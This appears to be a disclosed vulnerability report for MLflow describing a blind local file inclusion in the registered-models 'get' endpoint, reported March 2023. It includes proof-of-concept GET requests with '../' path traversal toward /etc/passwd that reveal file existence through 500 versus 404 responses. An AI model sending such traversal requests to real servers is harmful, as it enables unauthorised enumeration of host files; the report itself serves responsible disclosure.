Blind LFI in register-model/get?name= in mlflow/mlflow
Reported on
Mar 3rd 2023
Description
A blind LFI exists in /ajax-api/2.0/mlflow/registered-models/get?name=
The response from the server is different depending on if the file exists on the local file system or not. When the arbitrary local file exists, the server responds with 500 INTERNAL SERVER ERROR and when it doesn't exist it returns a 404 NOT FOUND response.
Proof of Concept
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/passwd HTTP/1.1
Returns 500 INTERNAL SERVER ERROR because /etc/passwd exists in the server.
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/doesNotExist
Returns 404 NOT FOUND because /etc/doesNotExist isn't a file on the local filesystem.
Impact
Allows attackers to enumerate files and services on the local operating system hosting the MLflow server.
Validated privately